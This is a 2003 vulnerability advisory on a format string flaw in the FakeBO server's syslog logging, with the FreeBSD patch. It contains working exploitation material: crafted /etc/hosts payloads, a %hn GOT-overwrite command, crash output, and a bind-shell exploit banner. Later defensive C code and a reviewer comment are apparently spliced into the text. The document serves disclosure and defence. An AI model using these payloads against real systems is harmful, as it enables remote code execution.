Secure Network Operations, Inc.                  http://www.secnetops.com
Strategic Reconnaissance Team                      research@secnetops.com
Team Lead Contact                                        kf@secnetops.com

Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.

Quick Summary:
************************************************************************
Advisory Number         : SRT2003-06-12-1212
Product                 : FakeBO server
Version                 : <= 0.4.1
Vendor                  : http://sourceforge.net/projects/fakebo/
Class                   : Remote
Criticality             : Low
Operating System(s)     : *nix, cygwin

High Level Explanation
************************************************************************
High Level Description  : Remote format string issue in syslogprintf()
What to do              : Apply patch or disable syslog in the config

Technical Details
************************************************************************
Proof Of Concept Status : Secure Network Operations does have PoC code

Low Level Description   :

FakeBO could be considered a novelty program by now; however, in some
situations it could still be used in some sort of novice honeypot
setup. It is also possible someone would think it a good way to trick
an office buddy who had installed the REAL BO on their PC earlier that
week. Someone mentioned the possibility of this being used in a crude
backdoor as well.

Both cygwin binaries and unix source are available from the FakeBO
website located at http://cvs.linux.hr/fakebo/. This issue can be
triggered in both the linux and win32 versions. In order to be
exploitable FakeBO must first be configured to use syslog() and the
target must have the proper resolver library in place.
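The two conditions above (syslog enabled, and a resolver that hands the peer's name to the logger unchecked) point at two defensive layers. The following is an added example, not FakeBO's own code; hostname_is_valid() and format_connection_log() are names of my own. It validates the resolved name the way a check-names resolver would, and builds the log line with a fixed format so the name only ever passes through a "%s" argument.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if host is a syntactically valid hostname in the sense a
   check-names resolver enforces: non-empty labels of letters, digits and
   '-', not starting or ending with '-', separated by single dots. The
   advisory's `..AAAABBBB%10$x%11$x' fails on its first (empty) label and
   again on '%' and '$'. */
int hostname_is_valid(const char *host)
{
    size_t len = strlen(host);
    if (len == 0 || len > 253) return 0;
    for (const char *label = host;;) {
        const char *dot = strchr(label, '.');
        size_t ll = dot ? (size_t)(dot - label) : strlen(label);
        if (ll == 0 || ll > 63 || label[0] == '-' || label[ll - 1] == '-')
            return 0;
        for (size_t i = 0; i < ll; i++)
            if (!isalnum((unsigned char)label[i]) && label[i] != '-')
                return 0;
        if (!dot)
            return 1;
        label = dot + 1;
    }
}

/* Builds FakeBO's connection log line the way the FreeBSD patch does it:
   the untrusted name only ever travels through a "%s" argument, so any
   directives it carries are printed literally, never interpreted. Names
   that fail the resolver-style check are kept (they are evidence) but
   marked. Returns the length snprintf would have produced. */
int format_connection_log(char *out, size_t outsz, int conn,
                          const char *host, const char *ip)
{
    return snprintf(out, outsz, "[NB] Connection[#%d] from `%s' (%s) accepted!%s",
                    conn, host, ip,
                    hostname_is_valid(host) ? "" : " [name failed check-names]");
}

int main(void)
{
    char line[256];
    /* constructed input: the name from the advisory's /etc/hosts example */
    format_connection_log(line, sizeof line, 0,
                          "..AAAABBBB%10$x%11$x", "127.0.0.1");
    puts(line);
    return 0;
}
```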
Syslog could be turned on in the fakebo.conf as follows:

  # you can set this to 1 if you want to log connections via syslog
  # 0 - do not log via syslog
  # 1 - log via syslog
  # 2 - log via syslog verbosely
  logtosyslog 1

Due to possible resolver issues the chances of this bug being actively
exploited are slim. The issues with the resolver are explained at
http://pi.cr.yp.to/ and http://cr.yp.to/djbdns/idn.html. If your bind
allows "allow_special all" or "options no-check-names" in
/etc/resolv.conf you may be exploitable.

To show the possibility of exploitation we simply use /etc/hosts as an
example. This is the entry in /etc/hosts:

  127.0.0.1 ..AAAABBBB%10$x%11$x

If we only make use of the console we would see this:

  04-09-2003 15:37:18 [NB] Connection[#0] from `..AAAABBBB%10$x%11$x' (127.0.0.1) accepted!

In syslog however we get more interesting output:

  Apr 9 15:37:18 vegeta FakeBO: [NB] Connection[#0] from `..AAAABBBB4141414142424242' (127.0.0.1)

This would be an example of overwriting the syslog() function in order
to exploit this issue.

  [dotslash@vegeta dotslash]$ objdump -R fakebo-0.4.1/fakebo|grep syslog
  08051cd4 R_386_JUMP_SLOT   syslog
  [root@vegeta dotslash]# echo -e "127.0.0.1 ..\xd6\x1c\x05\x08\xd4\x1c \x05\x08%10\$hn%11\$hn" > /etc/hosts

  (gdb) r -c /tmp/fakebo.conf
  Starting program: ~/fakebo-0.4.1/fakebo -c /tmp/fakebo.conf
  FakeBO version 0.4.1 Copyright (C) 1998,99 by KoSt
  Type `~/fakebo-0.4.1/fakebo -a' for details.
  04-09-2003 19:48:06 FakeBO 0.4.1 started using PID 2591.
  04-09-2003 19:48:25 [NB] Connection[#0] from `..??%10$hn%11$hn' (127.0.0.1) accepted!
  04-09-2003 19:48:43 [NB][#0] Client disconnected.

  Program received signal SIGSEGV, Segmentation fault.
  0x00240024 in ?? ()

If you wanted to take this simple example to the extreme...

  [dotslash@vegeta dotslash]$ head 0x82-fakebo_sux.c
  /*
  ** FakeBO v0.4.1 Proof of Concept exploit
  ** exploit by "you dong-hun"(Xpl017Elz), .
  **
  ** bash-2.04# ./0x82-fakebo_sux -t1
  ** [1] Make format string code.
  ** [2] Try localhost NetBUS port.
  ** [3] Make bind shellcode.
  ** [+] Waiting, execute shell.
  ** [*] Executed shell successfully !
  **
  ** Linux testsub 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
  ** uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys),
  ** 4(adm),6(disk),10(wheel)
  ** bash-2.04$
  **
  */

When being attacked, in syslog you would see the following:

  ** 05-31-2003 18:48:55 FakeBO 0.4.1 started using PID 6996.
  ** 05-31-2003 18:49:05 [NB] Connection[#0] from `ln%49115x%16$hn%6019x%15$hn' (127.0.0.1) accepted!
  ** 05-31-2003 18:49:06 [NB](#0): @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...

If however you were using an Immunix box (http://www.immunix.org) you
would see the following:

  [root@Immunity kf]# ./0x82-fakebo_sux -t1
  [1] Make format string code.
  [2] Try localhost NetBUS port.
  [3] Make bind shellcode.
  Broken pipe

Note we did not get a shell... that would be FormatGuard working its
magic:

  fakebo[6467]: ImmunixOS format error - mismatch of 0 in syslog() called by syslogprintf.

Cheers go to the Immunix team for their work on the FormatGuard product.

Patch or Workaround:
************************************************************************
Shortly after exploiting this issue on a non-Immunix system I looked
around to make sure this had not already been published. It turns out
that someone on the FreeBSD team also noticed this sometime last year
and wrote a patch.

  Fri Jun 7 01:16:21 2002 UTC (12 months ago) by kris
  - Fix a format string vulnerability which appears to be exploitable,
    and bump PORTREVISION.

--- misc.c.orig	Thu Jun 6 18:11:32 2002
+++ misc.c	Thu Jun 6 18:11:41 2002
@@ -107,7 +107,7 @@
 #ifdef HAVE_OPENLOG
 	openlog("FakeBO", LOG_CONS, LOG_USER);
-	syslog(LOG_WARNING, buf);
+	syslog(LOG_WARNING, "%s", buf);
 	closelog();
 #else
 #warning "Can't find usable syslog, disabled!"

Vendor Status           : Vlatko Kosturjak aka KoSt was notified about
                          the issue. No updates to the sourceforge site
                          or original home page have been made. A
                          recompiled cygwin binary is not available from
                          the Author at this time.
Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations, Inc. as a
matter of notification to help administrators protect their networks
against the described vulnerability. Exploit source code is no longer
released in our advisories. Contact research@secnetops.com for
information on how to obtain exploit information.
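Review bot: the "%s" fix at the `- syslog(LOG_WARNING, buf);` / `+ syslog(LOG_WARNING, "%s", buf);` pair is the right one, since buf carries the resolved peer name and was being used as the format argument; suggest complementing it so the same pattern cannot come back elsewhere in the file, by declaring syslogprintf() with __attribute__((format(printf, ...))) and building with -Wformat -Wformat-security, which makes the compiler flag a non-literal format passed without arguments. The #else branch only emits a #warning and disables logging, so nothing further is needed there.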
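For administrators who keep FakeBO's syslog output, the attack signature quoted in the advisory (positional references like %16$ and the %hn write conversion inside the connection line) can be checked for mechanically. The following detector is an added example, not part of the advisory or of FakeBO; its function names are my own and the sample log text is constructed from the lines quoted above.

```c
#include <ctype.h>
#include <string.h>

/* Constructed sample, built from the log lines quoted in the advisory. */
static const char SAMPLE_LOG[] =
    "Apr  9 15:37:18 vegeta FakeBO: [NB] Connection[#0] from `vegeta.example' (10.0.0.5) accepted!\n"
    "May 31 18:49:05 vegeta FakeBO: [NB] Connection[#0] from `ln%49115x%16$hn%6019x%15$hn' (127.0.0.1) accepted!\n"
    "May 31 18:50:00 vegeta kernel: disk 100% full\n"
    "Apr  9 15:37:18 vegeta FakeBO: [NB] Connection[#0] from `..AAAABBBB%10$x%11$x' (127.0.0.1) accepted!\n";

/* Scans one line (up to '\n' or NUL). Returns 1 if it contains a printf
   directive that selects an argument slot ("%16$...") or writes through
   one ("%n", "%hn"); those are what a format string attack needs. A bare
   "%" in ordinary text and the escaped "%%" are not flagged. */
int line_has_fmt_attack_directive(const char *line)
{
    for (const char *p = line; *p && *p != '\n'; p++) {
        if (*p != '%') continue;
        const char *q = p + 1;
        int positional = 0;
        if (*q == '%') { p = q; continue; }              /* literal "%%" */
        while (*q && strchr("-+ #0", *q)) q++;           /* flags */
        while (isdigit((unsigned char)*q)) q++;          /* width / index */
        if (*q == '$') { positional = 1; q++; }          /* "%16$..." */
        while (*q && strchr("-+ #0", *q)) q++;
        while (isdigit((unsigned char)*q)) q++;
        if (*q == '.') { q++; while (isdigit((unsigned char)*q)) q++; }
        while (*q && strchr("hlLqjzt", *q)) q++;         /* length mods */
        if (*q == 'n' || (positional && *q && strchr("diouxXcsp", *q)))
            return 1;
    }
    return 0;
}

/* Counts flagged lines in newline-separated syslog text. */
int count_flagged_lines(const char *log)
{
    int hits = 0;
    for (const char *s = log; *s; ) {
        hits += line_has_fmt_attack_directive(s);
        const char *nl = strchr(s, '\n');
        if (!nl) break;
        s = nl + 1;
    }
    return hits;
}
```

On the constructed sample, count_flagged_lines() reports 2: the two FakeBO connection lines carrying %16$hn and %10$x, while the ordinary "100% full" line is left alone.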